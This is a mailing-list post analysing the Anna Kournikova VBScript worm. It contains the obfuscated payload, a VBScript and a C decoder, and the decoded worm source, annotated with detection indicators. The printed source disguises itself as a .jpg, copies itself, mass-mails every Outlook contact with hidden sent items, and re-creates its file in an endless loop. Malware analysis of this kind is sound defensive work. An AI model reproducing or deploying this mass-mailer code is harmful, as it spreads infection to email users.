I've taken the virus (worm really) apart a bit more:

Here's the same thing, but with some comments added, and the variable
names renamed for clarity:
=================================================================
'Vbs.OnTheFly Created By OnTheFly
Execute
HisFunction("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqttgTwugoPzgvUvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+$9G5QJv786r0Rgtyiktgv$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(jE*t33+3(Etj3*63+(jE*t23+;(Etj5*+4(Etj3*;2+(jE*t9;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+(jE*t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(Etj3*;3+(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5(Etj6*+:(Etj;*+:gUvQtcyVopldi?7Egtvcqgldeg*vu$terkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veuktvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$kh9G5QJv786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg{no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*pgfhkhkopqjvp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y{fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVip7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiMyUMJ99z5t0cgcfnnMLUiJy9M590znEuqgFqKhqPvt*yQoclVip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++VgjpUvgWKg44:|6R2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gVwt+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpKhNqqrHpwveqkp4gUp9CnJNi*E+QptGqttgTwugoPzgvUvgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$hKF54xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0vgcPgorUec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuvqHtcGjeL4TRoOuD4ToKp8U4m33gi55NKhTLo4uR4OoD0TfCtfugGuvpktugE0wqvp>[EMAIL
 
PROTECTED];:cX|5gT?|3Vq6fFDz5yi3xLUvgk9sd4:6x5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?TLo4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g+k9sd4:6x5\5V0q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqjxc.g=+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$#(xednth($$guvYhpu:sI[h;?3sk496d5:5x0\vCcvjegovpuhuYsp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$k9sd4:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk496d5:5x0\qV>[EMAIL
 
PROTECTED]:6x5\5U0pgfGQ9v58Jr7R6t0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvzpGfhKgPvzpgfhkpGfwHepkvpqX)udiy370d2")

Function HisFunction(Variable_1)
'Reverse the string obfuscation used on the Execute payload above.
'The encoder took the clear text two characters at a time, swapped each
'pair, shifted every character up by 2, and stored line feed, carriage
'return and space as Chr(15), Chr(16) and Chr(17).
'Variable_1 is the obfuscated text; the return value is the clear text.
'A trailing unpaired character is decoded and emitted on its own.
Dim Pos, Idx, Cur, Plain(2)
For Pos = 1 To Len(Variable_1) Step 2
    'Plain(1) holds the decoded first char of the pair, Plain(2) the second
    Plain(1) = ""
    Plain(2) = ""
    For Idx = 1 To 2
        Cur = Mid(Variable_1, Pos + Idx - 1, 1)
        'Mid returns "" past the end of the string (odd-length input)
        If Cur <> "" Then
            Select Case Asc(Cur)
                Case 15
                    Plain(Idx) = Chr(10)            'LF
                Case 16
                    Plain(Idx) = Chr(13)            'CR
                Case 17
                    Plain(Idx) = Chr(32)            'space
                Case Else
                    Plain(Idx) = Chr(Asc(Cur) - 2)  'plain shift-by-2
            End Select
        End If
    Next
    'Undo the transposition: second char first, then the first
    HisFunction = HisFunction & Plain(2) & Plain(1)
Next
End Function
'Vbswg 1.50b
====================================================

The big long string at the top is scrambled (rather trivially, but
whatever) so that you can't quickly read it. Here's a .c program that
will unscramble the file for you (without bothering to fix that CR/LF
crap). It reads "virusstring" as its input. It currently outputs the
characters and their ASCII codes to stderr, and the unscrambled output
to stdout, so I'd suggest running it as: "./virusparse 1>virusout
2>outerr" to avoid messing up your terminal.

====================================================
/* Virusparse.c
program by RAP. decode string in .vbs file.
*/

#include "stdio.h"


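/*
 * decode_char: undo the per-character step of the worm's obfuscation.
 * Line feed, carriage return and space were stored as 15, 16 and 17;
 * every other character was shifted up by two.  Mirrors HisFunction
 * in the .vbs above.
 */
static int decode_char(int c)
{
   switch (c) {
   case 15: return 10;     /* LF */
   case 16: return 13;     /* CR */
   case 17: return 32;     /* space */
   default: return c - 2;  /* plain shift-by-2 */
   }
}

/*
 * Read the obfuscated string from a file (argv[1], or "virusstring" when
 * no argument is given), decode it two characters at a time and write
 * the clear text to stdout.  A trace of every input and output byte goes
 * to stderr, so redirect the two streams separately.
 *
 * Returns 0 on success, 1 when the input file cannot be opened.
 */
int main(int argc, char **argv){
   const char *path = (argc > 1) ? argv[1] : "virusstring";
   FILE *infile;
   int char1, char2;

   infile = fopen(path, "r");
   if (infile == NULL) {
      /* The original handed a NULL FILE* to fgetc when the file was missing. */
      perror(path);
      return 1;
   }

   while ((char1 = fgetc(infile)) != EOF) {
      char2 = fgetc(infile);

      if (char2 == EOF) {
         /* Odd-length input: the .vbs decoder keeps the final lone
            character (its second char is ""), so emit it rather than
            silently dropping it as the original loop condition did. */
         fprintf(stderr, "in#1:%c(%i), in#2:EOF\n", char1, char1);
         char1 = decode_char(char1);
         fprintf(stderr, "out#1:%c(%i)\n", char1, char1);
         printf("%c", char1);
         break;
      }

      fprintf(stderr, "in#1:%c(%i), in#2:%c(%i)\n", char1, char1, char2, char2);

      char1 = decode_char(char1);
      char2 = decode_char(char2);

      fprintf(stderr, "out#1:%c(%i), out#2:%c(%i)\n", char1, char1, char2, char2);

      /* The pair was transposed during encoding, so write it back swapped. */
      printf("%c%c", char2, char1);
   }

   fclose(infile);
   return 0;
}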

================================================================

Here's the output of the program (With some retouching to take care of
funky characters):

================================================================
'Vbs.OnTheFly Created By OnTheFly

'Main body of the decoded worm.  The annotations below are for analysis
'only; the code itself is unchanged.  Several statements are broken
'across lines by mail wrapping (no VBScript "_" continuation), so this
'listing is for reading, not for running.
'Indicators present in this block that are useful for detection: the
'registry key HKCU\software\OnTheFly (its value spelled out with Chr()
'below, presumably to avoid a plain-text string match), the file
'AnnaKournikova.jpg.vbs in the Windows folder, and a wscript.exe process
'that never exits because of the Do ... Loop at the bottom.
On Error Resume Next

'Infection marker.  The Chr() sequence spells "Worm made with Vbswg 1.50b".
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) &
Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr
(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) &
Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & C
hr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
'Copies itself into the Windows folder (GetSpecialFolder(0)); this copy
'is what the mailer below attaches.  The double extension hides ".vbs"
'behind ".jpg" when known extensions are not shown.
Set rOwamTjngb5= Createobject("scripting.filesystemobject")

rOwamTjngb5.copyfile
wscript.scriptfullname,rOwamTjngb5.GetSpecialFolder(0)&
"\AnnaKournikova.jpg.vbs"

'Mail out once: e2nSA7HlgLC sets the "mailed" value to "1" after a
'successful Send, so later runs skip this call.
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then

e2nSA7HlgLC()
end if
'Date trigger: on 26 January open Http://www.dynabyte.nl
'(Run window style 3 = maximized, false = do not wait for it).
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
'Keeps its own source in memory (opentextfile mode 1 = read only) ...
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close

'... and loops forever, re-creating the script file whenever it is gone.
'There is no Sleep, so this is a tight loop.  For clean-up the running
'wscript process has to be stopped before the file is removed, otherwise
'the file is written straight back.
Do

If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then

Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname,
True)
'"writeZN5JKZ4xiuV" is presumably ".write ZN5JKZ4xiuV" with the space
'lost in the retouching of the decoder output.
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close

End If

Loop

Function e2nSA7HlgLC()
'Mass-mailer routine.  Walks every Outlook address list and sends one
'message per address entry with the Windows-folder copy of the worm
'attached, then records "mailed"="1" so the main script does not call it
'again.  No parameters and no return value; it relies on the globals
'E7O3tH65p4P (WScript.Shell) and rOwamTjngb5 (FileSystemObject) set up
'by the main script.  On Error Resume Next swallows every failure, so
'without Outlook the routine silently does nothing.
'Detection: outbound mail with subject "Here you have, ;o)", a body of
'"Hi:" / "Check This!", and an attachment named AnnaKournikova.jpg.vbs.

On Error Resume Next

'Comparing the object to a string goes through its default property
'(presumably Name = "Outlook"), so this branch is only taken when Outlook
'is actually installed.
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then

Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")

'Every address list, every entry: no filtering at all.
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L

If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J

'CreateItem(0) is a mail item; one message per address entry.
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)

iq72b483v3Z.To = OIE4BVYjOJ8.Address

iq72b483v3Z.Subject = "Here you have, ;o)"

iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments

'Attaches the copy made by the main script, not the running file.
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)&
"\AnnaKournikova.jpg.vbs"

'The sent message is not kept, so nothing shows up in Sent Items.
iq72b483v3Z.DeleteAfterSubmit = True

If iq72b483v3Z.To <> "" Then

iq72b483v3Z.Send

'Marker checked by the main script before this routine is called.
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b

================================================================

CERT has some more info out there, but that's a look at the guts of the
worm anyhow...


--Rich


--

_________________________________________________________

Rich Puhek
ETN Systems Inc.
_________________________________________________________

